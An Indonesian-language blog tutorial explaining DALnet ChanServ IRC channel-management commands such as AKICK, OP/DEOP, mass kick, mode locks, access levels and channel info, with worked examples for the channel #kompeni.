Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AKICK (AutoKick) baru (ADD), menghapus AKICK (DEL), menampilkan datfar AKICK channel (LIST) dan menghapus seluruh AKICK dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AKICK dibatasi maksimum 200 entri.
Contoh : /chanserv AKICK #kompeni DEL *!*@*.net.id
Menghapus host *!*@*.net.id dari daftar AKICK channel #kompeni.
.:: OP | DEOP ::.
Penggunaan : /chanserv OP|DEOP #channel nickname
Keterangan : Perintah ini digunakan untuk meminta ChanServ memberikan atau mengambil status Operator @ nickname seseorang di channel.
Catatan : Perintah ini hanya dapat digunakan apabila kamu mempunyai akses minimal AOP di channel yang bersangkutan. Kamu tidak dapat men-DEOP seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang AOP tidak dapat men-DEOP SOP.
Contoh : /chanserv OP #kompeni bos_preman
Meminta ChanServ memberikan status Operator kepada nick bos_preman di channel #kompeni.
.:: MKICK ::.
Penggunaan : /chanserv MKICK #channel
Keterangan : Perintah MKICK (MassKick) ini hanya digunakan pada keadaan tertentu, misalnya pada keadaan disinkronisasi di channel (saat terjadi netsplit) atau keadaan lainnya. Untuk keterangan lebih lanjut tentang netsplit silahkan kunjungi DALnet Documentation Project Site http://docs.dal.net/docs/netsplits.html.
Catatan : Perintah ini tidak dapat kamu gunakan apabila di dalam channel terdapat seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang SOP tidak dapat menggunakan perintah MKICK apabila founder berada di dalam channel. Perintah ini menurut pandangan pribadi saya mempunyai akibat yang fatal, jadi tolong jangan sembarangan digunakan.
Contoh : /chanserv MKICK #kompeni
Memerintahkan ChanServ MassKick di channel #kompeni.
.:: MDEOP ::.
Penggunaan : /chanserv MDEOP #channel
Keterangan : Perintah MDEOP (MassDe-OP) ini akan men-DEOP semua orang di dalam channel yang mempunyai akses level sama dengan dan lebih rendah dari kamu, seorang AOP hanya dapat men-DEOP semua AOP dan operator non-permanen.
Contoh : /chanserv MDEOP #kompeni
Memerintahkan ChanServ MassDe-OP di channel #kompeni.
.:: SET - FOUNDER ::.
Penggunaan : /chanserv SET #channel FOUNDER
Keterangan : Perintah ini digunakan untuk meminta ChanServ mengganti nickname founder menjadi nickname yang sedang kamu gunakan sekarang.
Catatan : Nickname yang ingin kamu set menjadi founder harus sudah teregistrasi penuh dan kamu sebelumnya sudah identify ke ChanServ menggunakan password channel.
.:: SET - PASSWD ::.
Penggunaan : /chanserv SET #channel PASSWD oldpassword newpassword
Keterangan : Perintah ini untuk mengganti password channel.
Catatan : Untuk alasan keamanan, sangat disarankan untuk mengganti password channel kamu secara periodik.
Contoh : /chanserv SET #kompeni PASSWD menermenur menormenir
Mengganti password channel #kompeni dari menermenur menjadi menormenir.
.:: SET - DESC ::.
Penggunaan : /chanserv SET #channel DESC newdescription
Keterangan : Perintah ini untuk mengganti deskripsi channel.
Contoh : /chanserv SET #kompeni DESC fuck arrogant person!!!
Mengganti deskripsi channel #kompeni menjadi fuck arrogant person!!!.
.:: SET - MLOCK ::.
Penggunaan : /chanserv SET #channel MLOCK mode_lock_option
Keterangan : Perintah ini digunakan untuk men-set MLOCK (Mode Lock) channel. Perintah ini merupakan salah satu perintah penting dalam mengelola keamanan channel. Berikut di bawah ini adalah mode_lock_option yang bisa kamu gunakan beserta keterangannya :
R - Only Registered nicks allowed (hanya nick yang sudah teregistrasi yang diizinkan masuk ke dalam channel). Sangat berguna apabila kamu ingin menghentikan serangan clone, karena sebagian besar serangan clone menggunakan nick yang tidak teregistrasi. Disarankan untuk membiarkan opsi R dalam keadaan un-set dan hanya diaktifkan pada saat channel menghadapi serangan clone, dapat diaktifkan melalui perintah /mode #channel +R
+n - No external messages (tidak menerima message/pesan dari luar channel). Untuk mencegah orang yang tidak berada di dalam channel mengirimkan pesan ke channel. Disarankan men-set MLOCK +N.
+t - Only ops set topic (hanya yang mempunyai status operator (@) di channel yang dapat merubah topic channel). Untuk mencepat user biasa merubah topic channel.
+p - Channel is private (pribadi). Untuk membuat channel tidak terlihat di daftar channel pada saat user IRC menggunakan perintah /list untuk keterangan lebih lengkap silahkan ketik /help /list� di jendela status Mirc.
+s - Channel is secret (rahasia). Mempunyai fungsi yang sama dengan +p plus dengan tambahan channel tidak terlihat di whois. Kedua opsi MLOCK ini berguna untuk mencegah user yang tidak diinginkan masuk ke dalam channel.
+i - Channel is invite-only. Opsi ini membuat channel tertutup bagi semua orang sampai ada operator channel yang mengundang (invite) mereka atau mereka yang mempunyai akses ke channel menggunakan perintah /chanserv INVITE #channel.
+k - Required secret key (membutuhkan kunci rahasia/password). Setiap user harus memasukkan password yang benar baru bisa masuk ke dalam channel. Disarankan untuk men-set MLOCK -k bagi channel yang terbuka untuk umum.
+l - Channel is limited to person. Untuk membatasi jumlah user yang dapat masuk ke channel pada angka tertentu. Biasanya hanya digunakan apabila channel memiliki bot/shell untuk mengantisipasi serangan clone.
+m - Channel is moderated. Untuk mencegah user channel yang tidak memiliki status voice dan operator (tanda + dan @ di depan nickname) berbicara/chat di dalam channel. Disarankan untuk membiarkan opsi m dalam keadaan un-set dan hanya diaktifkan pada saat channel diserang flooder (flooding-attack), dapat diaktifkan melalui perintah /mode #channel +m
+c - Disable control codes (color, bold, underline, reverse). Untuk mencegah user chat di dalam channel menggunakan control codes (warna, cetak tebal, garis bawah, text ber latar-belakang). Opsi ini juga berguna dalam menghadapi serangan clone. Untuk keterangan lebih lanjut silahkan ketik /help control codes� di jendela status Mirc atau kunjungi DALnet Documentation Project Site http:/docs.dal.net/docs/modes.html.
Contoh : /chanserv SET #kompeni MLOCK +snt-kl
Men-set Mode Lock channel #kompeni ke mode +snt-kl (mengaktifkan opsi secret, no external message, only ops set topic dan menon-aktifkan opsi secret key, channel is limited).
.:: SET - OPGUARD ::.
Penggunaan : /chanserv SET #channel OPGUARD on|off
Keterangan : Apabila OPGUARD di-set ke posisi ON maka hanya AOP, SOP dan founder yang diizinkan ChanServ untuk memiliki status Operator (@) di dalam channel, operator lain tanpa akses minimal AOP akan diturunkan oleh ChanServ.
Catatan : Disarankan untuk men-set OPGUARD ke posisi ON untuk alasan keamanan channel dan mencegah user yang tidak diinginkan memiliki status operator di channel.
.:: SET - KEEPTOPIC ::.
Penggunaan : /chanserv SET #channel KEEPTOPIC on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan menyimpan topic channel pada saat channel tidak ada user dan mengembalikan topic channel apabila ada user yang masuk.
SET - URL
Penggunaan : /chanserv SET #channel URL [www.domainname.com]
Keterangan : Perintah ini untuk men-set alamat URL (Uniform Resource Locator) channel kamu, dimana URL channel dapat dilihat dengan perintah /chanserv INFO #channel.
Catatan : Untuk menghapus URL channel kamu cukup ketikkan /chanserv SET #channel URL� tanpa diikuti nama domain (URL).
Contoh : /chanserv SET #kompeni URL www.d0ntcry-kompeni.dal.net
Men-set URL channel #kompeni ke www.d0ntcry-kompeni.dal.net.
.:: SET - IDENT ::.
Penggunaan : /chanserv SET #channel IDENT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka para operator harus terlebih dahulu identify sebelum mereka di-Op oleh ChanServ.
.: SET - RESTRICT ::.
Penggunaan : /chanserv SET #channel RESTRICT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ tidak akan mengizinkan user yang tidak terdaftar di access list channel untuk masuk ke dalam channel. ChanServ akan segera meng-Kick & Ban mereka. Hanya user dengan akses minimal AOP channel yang diizinkan masuk.
.:: SET - VERBOSE ::.
Penggunaan : /chanserv SET #channel VERBOSE on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan me-Notify (mengirimkan pesan) setiap operator di dalam channel apabila terjadi perubahan pada access list channel seperti penambahan/penghapusan AOP, SOP, AKICK.
Notify dari chanserv akan berbentuk seperti ini :
-ChanServ:@#kompeni- [VERBOSE] zuguz!Lonely@202.155.32.53 => sop #kompeni add zuguz
.:: SET - TOPICLOCK ::.
Penggunaan : /chanserv SET #channel TOPICLOCK founder|sop|off
Keterangan : Perintah ini untuk menentukan siapa saja yang berhak merubah topic channel, Founder, SOP atau user biasa (off).
Catatan : Perintah ini berkaitan dengan perintah /chanserv SET #channel MLOCK +t silahkan lihat kembali bagian SET-MLOCK.
Contoh : /chanserv SET #kompeni TOPICLOCK sop
Perintah ini menentukan hanya operator channel #kompeni dengan akses minimal SOP yang dapat merubah topic channel.
.:: SET - LEAVEOPS ::.
Penggunaan : /chanserv SET #channel LEAVEOPS on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka ChanServ akan membiarkan user pertama yang masuk ke dalam channel memiliki status operator @ (channel dalam keadaan kosong). Pada keadaan default, LEAVEOPS di-set pada posisi OFF, ini artinya ChanServ akan men-DEOP siapapun yang tidak memiliki akses minimal AOP. Sangat direkomendasikan kepada kamu untuk membiarkan setting LEAVEOPS pada keadaan OFF dengan alasan keamanan.
.:: SET - UNSECURE ::.
Penggunaan : /chanserv SET #channel UNSECURE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka siapapun yang berada dalam access list nickname Founder tidak perlu identify terlebih dahulu untuk melakukan perubahan pada setting channel. Disarankan untuk membiarkan setting UNSECURE pada keadaan keadaan default (OFF).
.:: SET - PRIVATE ::.
Penggunaan : /chanserv SET #channel PRIVATE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka akan membuat perintah /chanserv INVITE tidak dapat digunakan. Dan hanya user yang mengetahui nama channel saja yang bisa masuk, nama channel juga tidak muncul di daftar channel (mirip dengan MLOCK +p).
.:: SET - MEMO ::.
Penggunaan : /chanserv SET #channel MEMO none|aop|sop|founder
Keterangan : Melalui perintah ini seorang Founder dapat menentukan siapa saja yang berhak mengirimkan memo channel.
none - tidak seorangpun dapat mengirimkan memo
aop - semua operator (AOP, SOP, Founder) berhak mengirimkan memo
sop - hanya operator dengan akses SOP dan Founder yang berhak mengirimkan memo
founder - hanya founder yang berhak mengirimkan memo
.:: SET - SUCCESSOR ::.
Penggunaan : /chanserv SET #channel SUCCESSOR nickname|-
Keterangan : Dengan perintah ini seorang Founder dapat menentukan nickname pengganti/cadangan apabila nickname founder expired. Pada saat nickname founder expired maka hak akses founder akan dialihkan kepada nickname cadangan tersebut. Apabila kamu ingin menghapus setting nickname Successor gunakan perintah /chanserv SET #channel SUCCESSOR -
Contoh : /chanserv SET #kompeni SUCCESSOR ketua_pengemis
Men-set SUCCESSOR channel #kompeni pada nickname ketua_pengemis
.:: SET - WEBPASSWD ::.
Penggunaan : /chanserv SET #channel WEBPASSWD password
Keterangan : Perintah ini gunanya untuk menentukan password bagi web site channel. DALnet memberikan fasilitas Webhosting bagi channel yang teregistrasi di databasenya. Keterangan lebih lanjut silahkan kunjungi DALnet Documentation Project Site bagian Webhosting Service.
Catatan : Password website harus berbeda dengan password channel supaya dapat dengan aman diserahkan kepada orang lain untuk dikelola.
Contoh : /chanserv SET #kompeni WEBPASSWD passwordweb
Men-set password website channel #kompeni dengan passwordweb.
.:: SET - MAILBLOCK ::.
Penggunaan : /chanserv SET #channel MAILBLOCK on|off
Keterangan : Perintah ini mengizinkan seorang Founder untuk menghidupkan/mematikan fasilitas MAILBLOCK. Apabila di-set pada posisi ON maka perintah /chanserv SENDPASS� tidak dapat lagi digunakan.
Catatan : Fasilitas MAILBLOCK ini tidak boleh dihidupkan (ON) sampai seorang Founder yakin sekali dirinya tidak menderita penyakit lupa ingatan.
.:: INVITE ::.
Penggunaan : /chanserv INVITE #channel
Keterangan : Perintah ini akan meng-Invite diri kamu sendiri ke dalam channel yang di-set mode +R/+O/+i/+l/+k/+b.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
.:: ACC / ACCESS ::.
Penggunaan : /chanserv ACC|ACCESS #channel nickname
Keterangan : Perintah ini digunakan oleh seseorang yang memiliki akses AOP atau lebih tinggi untuk melihat hak akses dirinya sendiri atau orang lain di channel. Berikut di bawah ini adalah definisi dari level hak akses (dalam angka) :
-2 = Channel is frozen or closed (channel dibekukan atau ditutup)
-1 = AutoKICKed from the channel (nickname bersangkutan masuk dalam daftar AKICK channel)
0 = basic (nickname bersangkutan tidak punya akses di channel atau sedang tidak On-Line)
1 = AutoOp (akses AOP - Auto Operator)
2 = SuperOp (akses SOP - Super Operator)
3 = Has founder access via a NickServ access list mask (akses Founder via daftar akses pada database NickServ)
4 = Has founder access via identification to NickServ (akses Founder via Identify password nick pada NickServ)
5 = Has founder access via identification to ChanServ (akses Founder via Identify password channel pada ChanServ)
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv ACC #kompeni d0ntcry
Melihat level hak akses nick d0ntcry di channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- d0ntcry ACC #kompeni 2 (SOP)
.:: WHY ::.
Penggunaan : /chanserv WHY #channel nickname
Keterangan : Perintah ini mirip dengan perintah ACC/Access, hasilnya berupa status user di channel (AOP/SOP/Founder). Gunanya untuk melihat hak akses yang digunakan user untuk naik menjadi operator channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv WHY #kompeni d0ntcry
Melihat status/hak akses nick d0ntcry di channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- d0ntcry has FOUNDER access to #kompeni. Reason: Identification to services with the channel password.
.:: UNBAN ::.
Penggunaan : /chanserv UNBAN #channel nickname|*|nick!user@host.domain
Keterangan : Perintah ini gunanya untuk meminta ChanServ meng-Unbanned diri kamu, nickname lain, host/domain tertentu, dan seluruh daftar banned. Untuk meng-Unbanned diri kamu cukup ketik /chanserv UNBAN #channel.
Catatan : AOP hanya dapat meng-Unbanned diri sendiri, nickname lain dan host/domain tertentu, SOP dan Founder dapat meng-Unbanned seluruh daftar banned dengan menggunakan tanda *.
.:: COUNT ::.
Penggunaan : /chanserv COUNT #channel
Keterangan : Perintah ini untuk meminta ChanServ menghitung jumlah AOP, SOP dan AKICK suatu channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.
Contoh : /chanserv COUNT #kompeni
Menghitung jumlah AOP, SOP dan AKICK channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- Channel: #kompeni - AOP: 20 SOP: 11 AKICK: 5
.:: INFO ::.
Penggunaan : /chanserv INFO #channel
Keterangan : Untuk menampilkan informasi tentang channel (setting, topik, tanggal register, tanggal terakhir penambahan AOP/SOP, dll).
Contoh : /chanserv INFO #kompeni
Menampilkan informasi tentang channel #kompeni, hasilnya lebih kurang seperti di bawah ini :
-ChanServ- Info for #kompeni:
-
-ChanServ- Founder : d0ntcry (~n0b0dy@ngebet.pengen.ml.ma.pacar.la)
-
-ChanServ- Mode Lock : -s
-
-ChanServ- Last Topic : Apa asikx cinta tanpa "CIPOX" bagai sawah tanpa "KODOK" bagai "REMAJA" tanpa "ROKOK" bagai "BH" tanpa "KATOX" tpi klu cuman berani "CIPOX" gak berani "NGOBOK²" tuh namax "KATROX"|by:Zuguz (zuguz)
-
-ChanServ- Description: If you arrogant person..please go out in channel kompeni!!ok..
-
-ChanServ- Options : SecuredOps, Ident, "Sticky" Topics
-
-ChanServ- Memo Level : AOP
-
-ChanServ- Registered : Wed 24-Sep-2008 04:23:41 UTC
-
-ChanServ- Last opping: Sat 07-Mar-2009 12:13:56 UTC
-
-ChanServ- *** End of Info ***
Referensi perintah ChanServ :
The DALnet IRC Network : /chanserv help [command] [sub-command]
The DALnet Documentation Project : http://docs.dal.net/chanserv.htm
DALnet™s Homepage : http://www.dal.net/services/
sumber : http://ircmataram.wordpress.com
http://www.virtual-dalnet.com/nickserv.html
Kalo kesulitan join aja di #kompeni@irc.dal.net
Label
- Berita (6)
- Koleksi (11)
- Mutiara Cinta (7)
- My Story (4)
- Tips (3)
- Tutorial (11)